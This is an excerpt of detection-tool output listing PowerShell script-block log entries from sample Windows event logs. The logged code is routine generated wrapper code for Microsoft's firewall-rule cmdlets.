'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"LocalOnlyMapping}) $__cmdletization_queryBuilder.FilterByProperty('LocalOnlyMapping', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Owner') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Owner}) $__cmdletization_queryBuilder.FilterByProperty('Owner', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PrimaryStatus') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PrimaryStatus}) $__cmdletization_queryBuilder.FilterByProperty('PrimaryStatus', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('Status') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${Status}) $__cmdletization_queryBuilder.FilterByProperty('Status', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSource') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSource}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSource', $__cmdletization_values, $true, 'Default') } if ($PSBoundParameters.ContainsKey('PolicyStoreSourceType') -and (@('ByQuery') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_values = @(${PolicyStoreSourceType}) $__cmdletization_queryBuilder.FilterByProperty('PolicyStoreSourceType', $__cmdletization_values, $false, 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallAddressFilter') -and (@('ByAssociatedNetFirewallAddressFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallAddressFilter}, 'MSFT_NetFirewallRuleFilterByAddress', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallApplicationFilter') -and (@('ByAssociatedNetFirewallApplicationFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallApplicationFilter}, 'MSFT_NetFirewallRuleFilterByApplication', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceFilter') -and (@('ByAssociatedNetFirewallInterfaceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceFilter}, 'MSFT_NetFirewallRuleFilterByInterface', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallInterfaceTypeFilter') -and (@('ByAssociatedNetFirewallInterfaceTypeFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallInterfaceTypeFilter}, 'MSFT_NetFirewallRuleFilterByInterfaceType', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallPortFilter') -and (@('ByAssociatedNetFirewallPortFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallPortFilter}, 'MSFT_NetFirewallRuleFilterByProtocolPort', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallSecurityFilter') -and (@('ByAssociatedNetFirewallSecurityFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallSecurityFilter}, 'MSFT_NetFirewallRuleFilterBySecurity', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallServiceFilter') -and (@('ByAssociatedNetFirewallServiceFilter') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallServiceFilter}, 'MSFT_NetFirewallRuleFilterByService', 'PartComponent', 'GroupComponent', 'Default') } if ($PSBoundParameters.ContainsKey('AssociatedNetFirewallProfile') -and (@('ByAssociatedNetFirewallProfile') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.FilterByAssociatedInstance(${AssociatedNetFirewallProfile}, 'MSFT_NetFirewallRuleInProfile', 'GroupComponent', 'PartComponent', 'Default') } if ($PSBoundParameters.ContainsKey('All') -and (@('GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('All', ${All}) } if ($PSBoundParameters.ContainsKey('PolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('PolicyStore', ${PolicyStore}) } if ($PSBoundParameters.ContainsKey('GPOSession') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('GPOSession', ${GPOSession}) } if ($PSBoundParameters.ContainsKey('TracePolicyStore') -and (@('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll') -contains $PSCmdlet.ParameterSetName )) { $__cmdletization_queryBuilder.AddQueryOption('TracePolicyStore', ${TracePolicyStore}) } $__cmdletization_methodParameters = [System.Collections.Generic.List[Microsoft.PowerShell.Cmdletization.MethodParameter]]::new() switch -exact ($PSCmdlet.ParameterSetName) { { @('ByName', 'ByDisplayName', 'ByQuery', 'ByAssociatedNetFirewallAddressFilter', 'ByAssociatedNetFirewallApplicationFilter', 'ByAssociatedNetFirewallInterfaceFilter', 'ByAssociatedNetFirewallInterfaceTypeFilter', 'ByAssociatedNetFirewallPortFilter', 'ByAssociatedNetFirewallSecurityFilter', 'ByAssociatedNetFirewallServiceFilter', 'ByAssociatedNetFirewallProfile', 'GetAll', 'InputObject (cdxml)') -contains $_ } { $__cmdletization_returnValue = $null $__cmdletization_methodInvocationInfo = [Microsoft.PowerShell.Cmdletization.MethodInvocationInfo]::new('cim:DeleteInstance', $__cmdletization_methodParameters, $__cmdletization_returnValue) $__cmdletization_passThru = $PSBoundParameters.ContainsKey('PassThru') -and $PassThru if ($PSBoundParameters.ContainsKey('InputObject')) { foreach ($x in $InputObject) { $__cmdletization_objectModelWrapper.ProcessRecord($x, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } else { $__cmdletization_objectModelWrapper.ProcessRecord($__cmdletization_queryBuilder, $__cmdletization_methodInvocationInfo, $__cmdletization_PassThru) } } } } } catch { $__cmdletization_exceptionHasBeenThrown = $true throw } } End { try { if (-not $__cmdletization_exceptionHasBeenThrown) { $__cmdletization_objectModelWrapper.EndProcessing() } } catch { throw } } # .EXTERNALHELP NetFirewallRule.cmdletDefinition.cdxml-Help.xml } Microsoft.PowerShell.Core\Export-ModuleMember -Function 'Remove-NetFirewallRule' -Alias '*' function Rename-NetFirewallRule { [CmdletBinding(DefaultParameterSetName='GetAll', SupportsShouldProcess=$true, ConfirmImpact='Medium', PositionalBinding=$false)] [OutputType([Microsoft.Management.Infrastructure.CimInstance])] [OutputType('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallRule')] param( [Parameter(ParameterSetName='ByName', Mandatory=$true, Position=0)] [Alias('ID')] [ValidateNotNull()] [string[]] ${Name}, [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [ValidateNotNull()] [string[]] ${DisplayName}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Description}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${DisplayGroup}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Group}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Enabled[]] ${Enabled}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Direction[]] ${Direction}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.Action[]] ${Action}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.EdgeTraversal[]] ${EdgeTraversalPolicy}, [Parameter(ParameterSetName='ByQuery')] [Alias('LSM')] [ValidateNotNull()] [bool[]] ${LooseSourceMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [bool[]] ${LocalOnlyMapping}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string",../hayabusa-rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,medium,,Potentially Malicious PwSh,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${GPOSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [switch] ${TracePolicyStore}, [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#MSFT_NetFirewallRule')] [ValidateNotNull()] [ciminstance[]] ${InputObject}, [Parameter(ParameterSetName='ByName', Mandatory=$true)] [Parameter(ParameterSetName='ByDisplayName', Mandatory=$true)] [Parameter(ParameterSetName='ByQuery', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true)] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true)] [Parameter(ParameterSetName='GetAll', Mandatory=$true)] [Parameter(ParameterSetName='InputObject (cdxml)', Mandatory=$true)] [string] ${NewName}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [Alias('Session')] [ValidateNotNullOrEmpty()] [CimSession[]] ${CimSession}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [int] ${ThrottleLimit}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [Parameter(ParameterSetName='InputObject (cdxml)')] [switch] ${AsJob}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSet",../hayabusa-rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.004-Remote Service SSH/ID4103-4104-OpenSSH server activation and config.evtx 2021-04-22 19:19:37.904 +09:00,win10-02.offsec.lan,4104,info,,PwSh Scriptblock Log,"[]] ${Owner}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PrimaryStatus[]] ${PrimaryStatus}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${Status}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [string[]] ${PolicyStoreSource}, [Parameter(ParameterSetName='ByQuery')] [ValidateNotNull()] [Microsoft.PowerShell.Cmdletization.GeneratedTypes.NetSecurity.PolicyStoreType[]] ${PolicyStoreSourceType}, [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetAddressFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallAddressFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetApplicationFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallApplicationFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetInterfaceTypeFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallInterfaceTypeFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetProtocolPortFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallPortFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetNetworkLayerSecurityFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallSecurityFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetServiceFilter')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallServiceFilter}, [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile', Mandatory=$true, ValueFromPipeline=$true)] [PSTypeName('Microsoft.Management.Infrastructure.CimInstance#root/standardcimv2/MSFT_NetFirewallProfile')] [ValidateNotNull()] [ciminstance] ${AssociatedNetFirewallProfile}, [Parameter(ParameterSetName='GetAll')] [switch] ${All}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallApplicationFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallInterfaceTypeFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallPortFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallSecurityFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallServiceFilter')] [Parameter(ParameterSetName='ByAssociatedNetFirewallProfile')] [Parameter(ParameterSetName='GetAll')] [string] ${PolicyStore}, [Parameter(ParameterSetName='ByName')] [Parameter(ParameterSetName='ByDisplayName')] [Parameter(ParameterSetName='ByQuery')] [Parameter(ParameterSetName='ByAssociatedNetFirewallAddressFilter')] 